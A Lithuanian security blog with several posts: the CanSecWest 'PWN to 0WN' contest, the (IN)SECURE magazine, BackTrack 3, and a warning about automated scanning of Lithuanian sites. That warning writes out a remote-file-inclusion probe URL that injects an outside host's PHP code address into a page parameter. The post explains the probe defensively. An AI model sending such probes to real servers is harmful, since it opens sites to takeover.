Nuo 2007 metų konferencijos CanSecWest metu vyksta konkursas “PWN to 0WN”. Šiemet konkursas vyko antrą kartą. Visas veiksmas vyksta tris dienas, o jo metu saugumo analizei pateikiami 3 nešiojami kompiuteriai su standartinėm OS instaliacijomis ir visais atnaujinimais. Šiemet konkurse dalyvavo:

• Sony VAIO VGN-TZ37CN su Ubuntu 7.10
• Fujitsu U810 su Vista Ultimate SP1
• MacBook Air su OSX 10.5.2

Konkurso tikslas - išlaužti kurią nors sistemą. Tačiau tam egzistuoja kelios taisyklės. Kadangi konkurso trukmė yra trys dienos, tai pirmąją dieną galima išnaudoti tik nuotolinius pažeidžiamumus be jokių įsikišimų iš sistemų vartotojų. T.y. tiesiog tinkle yra įjungtos šios trys sistemos ir tikslas yra surasti jose rimtus pažeidžiamumus. Pirmam tai padariusiam atitektų išlaužtas kompiuteris ir 20 000 USD piniginis prizas. Antrąją dieną sąlygos šiek tiek keičiasi. Jau galima išnaudoti ne tik nuotolinius pažeidžiamumus, bet ir standartinių klientinės dalies aplikacijų pažeidžiamumus (pvz. paspausti el. paštu atėjusią nuorodą, nueiti į kokį nors tinklalapį ar pasinaudoti pokalbių programa). Pirmam tai padariusiam antrąją dieną atitektų išlaužtas kompiuteris ir 10 000 USD piniginis prizas. Trečiąją dieną sąlygos dar palengvėja. Dabar jau galima diegti į sistemas populiarias trečiųjų šalių aplikacijas. Žinoma, mažėja ir prizas. Trečią dieną laimėti galima išlaužtą kompiuterį ir 5000 USD piniginį prizą. Vienu metu viena komanda gali dirbti tik su viena sistema. Sistemos keičiasi kas tam tikrą laiko tarpą.

Skaityti visą įrašą…

Na va, rodos į Blogin vis tik pakliūsiu. Susitiksim ten. O šiandien noriu pristatyti dar vieną nemokamą dalyką internete. Jei prieš tai pristatinėjau BackTrack operacinę sistemą, tai dabar bus informacijos apsaugos tema rašantis žurnalas (IN)SECURE. Žurnalas tik PDF formatu, apie 130 puslapių ir išeinantis nereguliariai. Tarp numerių gali būti 2, o gali būti ir 4 mėn. skirtumas. Jį rasite adresu http://www.net-security.org/insecuremag.php.

Ten pat yra ir visų anksčiau išleistų numerių archyvas. Rašo apie viską po truputį saugos tema. Dažnai pradeda nuo technologinių sprendimų apžvalgos, kurioje pakankamai daug vietos užima to žurnalo rėmėjai. Kai kuriuos straipsnius skaitant būtina žinoti bent jau techninius terminus, kituose tokios žinios visai nebūtinos. Kaip jau supratot, temų yra įvairaus pobūdžio. Pvz. paskutiniame numeryje yra tema apie manipuliaciją žmonėmis, t.y. socialinę inžineriją. Skiriama dėmesio ir įvairiems informacijos apsaugos standartams. Kiekviename numeryje apžvelgiamos knygos informacijos apsaugos tematika. Neužmirštama ir su tuo susijusi programinė įranga. Manau, kad žurnalas turėtų būti įdomus tiek pradedančiam domėtis informacijos apsauga, tiek jau ir pažengusiam toje srityje (nes čia tiesiog nėra kada sustoti).

P.S. Gal galit man pasakyti kodėl aš sugalvojau savo tinklaraščiui (taip taip, pradedu kalbėti lietuviškai) užmauti savo dizainą? Jų tiek visokių neblogų ir su tinkamu išdėstymu pripiešta yra, o aš sau tik papildomo darbo prisidariau…

Šiandien mane kaip reikiant sunervavo nezinau.lt su savo blogorama. Joje radau, kad bilietai į Blogin konferenciją jau pasibaigę. Kadangi šiandien pagaliau paaiškėjo, kad penktadienis man neužimtas, tai rytdieną planavau pradėti nuo bilieto pirkimo. Tai ką dabar rytoj ryte veikt? Ei, Blogin organizatoriai, kaip pirmo etapo blog’ų konkurso nugalėtojui galėtumėte kokį bilietą ir sukrapštyti. Žodžiu turiu problemą dabar gyvenime. Kur gauti bilietą?

Kad jau taip, tai pabūsiu šiandien blogas ir supažindinsiu Jus su linux live distribucija Backtrack 3. Kol kas tik beta. Bet jos autoriai sako, kad ne betoje bus tik didesnis suderinamumas su įranga.

Skaityti visą įrašą…

Per pasaulį keliauja automatizuota pažeidžiamumų paieška. Šiandien ji vėl užsuko į Lietuvą. Tikslas tokios paieškos paprastas - rasti tinklalapius, kuriuose galima vykdyti PHP programinį kodą iš nutolusių šaltinių. Pažeidžiamumų paieška vyksta per HTTP protokolo GET užklausų parametrus. T.y. per adreso eilutę. Pvz. Jei kažkokią informaciją iš puslapio galima pasiekti adresu www.isec.lt/page.php?id=1, tai pažeidžiamumas tikrinamas suformauojant tokį adresą: www.isec.lt/page.php?id=http://sahel55.com/articles/omaduro/kimumid/. Ir tas pats bandoma su visais adreso parametrais. Jei nueisit adresu http://sahel55.com/articles/omaduro/kimumid/, tai nerasit nieko daugiau, tik vieną PHP kodo eilutę:

Jei Jūsų serveris šios eilutės neapdoros, tai nieko ir neįvyks. Bet jei Jūsų serveris išskaičiuos MD5 ir pateiks kaip atsakymą į užklausą, tai automatinės pažeidžiamumo paieškos autoriams turėtų būti ženklas, kad galima perimti Jūsų serverio valdymą. Ir jie turbūt tai padarys. Neabejoju, kad su lietuviškais tinklalapiais jiems tikrai pasiseks. Po kelių dienų laukim pranešimo spaudoje su kokia nors tokia antrašte: “Arabų programišiai išdarkė daugiau nei pusę lietuviškų tinklalapių”. Dabar Jūs eikit žiūrėti savo tinklalapio log’ų ar pas jus šis testas dar nebuvo užsukęs ir ar jam nepasisekė, o aš einu paspęsiu spąstus tolimesnei analizei. Tikiuosi spąstai suveiks.